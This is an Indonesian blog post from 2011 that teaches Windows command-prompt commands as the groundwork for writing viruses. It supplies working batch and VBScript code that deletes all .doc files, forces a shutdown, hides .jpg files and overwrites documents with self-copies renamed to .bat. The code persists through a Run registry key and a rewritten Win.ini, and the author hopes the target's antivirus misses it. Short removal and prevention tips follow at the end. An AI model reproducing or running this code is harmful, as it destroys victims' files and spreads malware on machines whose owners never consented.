Saturday, January 29, 2011

Beberapa Perintah Dalam CMD Sebagai Dasar Pembuatan Virus

1.Delete Registry : REG DELETE ALAMAT /v VALUE NAME /f
Keterangan :
- REG DELETE = Menghapus registry
- ALAMAT = HKEY\Software\dst
- /v VALUE NAME = Nama Value
- /f = Tidak wajib!! Berfungsi untuk melaksanakan perintah tanpa prompt
Contoh : REG DELETE HKEY\Software\Microsoft\Windows\Policies\Explorer /v NoFind
Fungsi = Menghapus Value NoFind Di Alamat Registry HKEY\Software\Microsoft\Windows\Policies\Explorer

2.ADD Registry : REG ADD ALAMAT /v VALUE NAME /t TYPE /s SEPARATOR /d DATA /f
Keteranagn :
- REG ADD = Menambah registry
- ALAMAT = HKEY\Software\dst
- /v VALUE NAME = Nama Value
- /t TYPE = Type data Ex: REG_DWORD, REG_SZ
- /d DATA = Isi Value
- /f = Tidak wajib!! Berfungsi untuk melaksanakan perintah tanpa prompt

3.PROMPT : PROMPT Text
Keterangan:
PROMPT = Perintah untuk merubah text PROMPT
Text = Text yang ingn kita munculkan di PROMPT
Text dapat menggunakan karakter spesial yang daftarnya berikut ini!!
$A = Karakter & $N = Drive kita menginstal windows
$B = Karakter | $P = Default
$C = Karakter ( $Q = Karakter =
$D = Karakter Tanggal Sekarang $S = Karakter Spasi
$E = Karakter Escape Kode $T = Karakter Jam Sekarang
$F = Karakter ) $V = Karakter No Versi Windows
$G = Karakter > (lebih besar dari) $_ = Karakter Garis Bawah
$H = Karakter No Text $$ = Karakter Dollar
$L = Karakter < (lebih kecil dari) $+ = Karakter Aritmatik

4.Replace : Replace [Drive\Path\NamaFile] [Drive\Path] /A /P /R /S /W /U
Keterangan:
Replace = Pindahkan
- [Drive\Path\NamaFile] = Spesifik sumber file
- [Drive\Path\] = Folder Tujuan
- A = Pindahkan File ke Folder Tujuan (No Update)
- P = Membuat Prompt MengKonfirmasi Kita Sebelum Memindahkan
- R = Pindahkan hanya File Attribut Read Only
- S = Pindahkan File Ke Semua Sub Direktori Folder Tujuan
- W = Tunggu kita memasukan disk/flashdisk sebelum memindahkan
- U = Pindahkan dan Update jika nama file sudah ada
- Jika menggunakan parameter /A tidak boleh menggunakan /S /U begitu juga sebaliknya.

5.Attrib : Attrib +R -R +A -A +H -H +S -S ADRESS /S /D
Keterangan:
Attrib = Rubah Attribut File/Folder
- (-) = Untuk Menghapus Attribut
- (+) = Untuk Menambah Attribut
- (A) = Attribut Archieve
- (R) = Attribut Read Only
- (H) = Attribut Hidden
- (S) = Attribut Super_Hidden/System
- /S = Proses terhadap file yang sama di folder dan subfolder
- /D = Proses folder Sebagai Sumber
- Adress = Alamat File Misal: C:\Lucky\Ganteng

6.Del : Del /P /F /S /Q /Attribut /Adress
Keterangan:
- Del = Hapus File / Folder
- /P = Membuat Prompt MengKonfirmasi Kita Sebelum Menghapus
- /F = Hapus Hanya Read Only File
- /S = Hapus File Yang Sama Di Semua Sub Direktory
- /Q = Hapus Dengan Cepat
- /Attribut = Pilih Attribut File Yang Ingin Di Hapus (Tidak Ada Berarti Semua File) tanda (-) berarti yang tidak di hapus- - Adress = Alamat File Misal: C:\Lucky\Ganteng

7.Rename : Rename/Ren [Drive\Path\NamaFile] NewFileName
Keterangan:
- Rename = Rubah Nama File
- [Drive\Path\NamaFile] = Alamat Drive dan Nama File
- NewFileName = Nama File Baru

8.Type : Type [Drive\Path\NamaFile]
Keterangan:
- Type = Membuka Semua File Text (*.txt, *.doc, *.xls, *.ini, *.vbs, *.js, dll)
- [Drive\Path\NamaFile] = Lokasi File

9.Start : Start ADDRESS_FILE
- Start = Untuk menjalankan File
- ADDRESS_FILE = Alamat file di special folder seperti windows dan system32
- Ex: Start Regedit maka akan menjalankan Registry Editor.
sekarang kita akan membahas file *.bat yang berfungsi untuk menjalankan perintah command prompt secara bersamaan. oke ketikan kode berikut di notepad: date 07-07-07 dan save dengan nama edit_time.bat dan pilih “All File” dalam kolom “Save As Type” lalu jalankan!! setelah itu apa yang terjadi?? yah tanggal berubah jadi juli-7-2007.

oke lanjut ke file *.bat kita tidak mungkin membuat banyak file *.bat karena selain akan cepat terdeteksi, kita juga akan semakin rumit merubahregistry!! namun jangan kuatir karena file *.bat bisa menjalankan perintah DOS/COMMAND_PROMPT secara langsung.
berikut perintah ini, kita buka notepad dan ketikan code berikut:
del C:\*.doc ‘—– hapus semua file berextensi doc di drive c
Shutdown -s -f -t 30 -c “Selamat Tidur” ‘—– -s = shutdown computer, -f = tutup semua aplikasi tanpa peringatan, -t = setting waktu(dalam detik) -c = menampilkan pesan “Selamat Tidur” (Bebas kita ubah)
attrib +s +h C:\*.jpg /s /d ‘—– beri attribut hidden dan system semua file jpg
for /R c:\ %%r in (*.cob *.doc) do copy %0 “%%r” ‘—– Copy isi file *.bat ke semua file *.cob dan *.doc di C
for /R c:\ %%r in (*.cob *.doc) do ren “%%r” *.bat ‘—– Rename semua file *.cob dan *.doc jadi *.bat sehingga isi file jd virus kita :D haha..haha
Untuk isi file bat yang akan menumpang di virus vbs kita anda boleh pilih mana yang paling cocok!! mungkin menghapus, shutdown dalam 30 detik, menyembunyikan atau merubah isinya jadi file *.bat?? dipilih!! dipilih!!
atau boleh masukin semuanya sehingga virus kita ditambah kode berikut ini:
Set bath = fso.CreateObject(towind & “\sialan.bat”)
bath.writeline “del C:\*.doc”
bath.writeline “Shutdown -s -f -t 30″
bath.writeline “for /R c:\ %%r in (*.cob *.doc) do copy %0 %%r”
bath.writeline “for /R c:\ %%r in (*.cob *.doc) do ren %%r *.bat”
bath.close
‘bonus
wsh.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\”SysError”, “towind & “\sialan.bat”, “REG_SZ”
Maka ketika windows diaktifkan semua file doc akan menjadi *.bat dengan isi kode penghancur kita :D bisa diselamatkan ga tuh?? coba saja supaya anda tahu!!
Namun jika anda punya anti virus biasanya kode tersebut akan di blok karena jelas-jelas untuk merusak!! lalu bagaimana?? kita berdoa supaya antivirus komputer sasaran tidak mengenali :D karena memang tidak semua antivirus akan memblok perintah tersebut. Oia sebagai tambahan kita bisa membuat file lain seperti *.html atau *.ini!! jika kita punya banyak duplikat virus kita bisa membuat file *.ini supaya orang tidak cepat mengetahui virus kita hanya dengan membuka Regedit. untuk terakhir kali saya akan berikan lagi suatu code yang akan merubah file ini diwindows sehingga menjalankan virus kita. oke langsung saja tentunya dengan perintah
set BuatIni = fso.CreateTextFile(”C:\WINDOWS\Win.ini”)
BuatIni.writeline “[WINDOWS]”
BuatIni.writeline “run = C:\Ju_Pe.vbs” ‘—-rubah sesuai letak dan nama virus
BuatIni.writeline “load = C:\Persik.vbs” ‘—-rubah sesuai letak dan nama virus
BuatIni.close
Maka ketika windows dijalankan virus akan aktif!! walaupun mungkin registry telah dirubah.
Dari pembahasan kita maka kita bisa simpulkan beberapa langkah berikut jika terkena virus vbs: jika tidak di enkripsi anda bisa melihat dan membunuh semua virus dan membenarkanregistry dengan membaca source kodenya, tapi jika di enkripsi kita lakukan langkah berikut:
1.Matikan proses virus!! anda bisa menggunakan tool pengganti TaskManager yang biasanya akan di blok.
2.Hapus semua duplikat virus!! anda bisa gunakan antivirus update terbaru dan jika diblok virus anda rubah dulu namanya seperti PCMAV_CLN.exe jadi 123.exe
3.Buka registry dan periksa dengan teliti semua subkey run otomatis biasanya akan terdapat key yang mengarah ke letak virus yang dijalankan dan periksa file win.ini!! jika dirubah anda minta dari komputer teman anda :D dan jika ada petunjuk letak virus langsung hapus.
4.Rubah semua registry yang dirubah virus!! bisa dengan TuneUp Utilities dan sebagainya!!
Untuk pencegahan lakukan langkah berikut:
1.Gunakan antivirus terbaru, jika bisa yang mempunyai fitur heuristik seperti ANSAV.
2.Jangan asal klik file!! lihat dikolom type Windows Explorer apabila application tapi iconnya folder atau MS Word langsung hapus.
3.Selalu scan jika mencolokan flaskdisk
4.Matikan proses autorun melalui registry di alamat
“HKCU(atau HKLM)\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer”, buat DWORD value baru dengan nama NoDriveTypeAutorun dan isi dengan nilai 255. atau melalui start—Run—ketik GPEDIT.msc—User Configuration—Administratif Templates—–System—–Cari Turn Off AutoPlay—–klik 2x dan rubah jadi Enabled!!
5.Jangan Pakai OS Windows, pake linux cos VMaker Indonesia cuma bisa bikin untuk windows

Sisanya Berfikir Sendiri Ya...
No Pain...
No Gain...

No comments:

Post a Comment

post a comment before leave this blog :)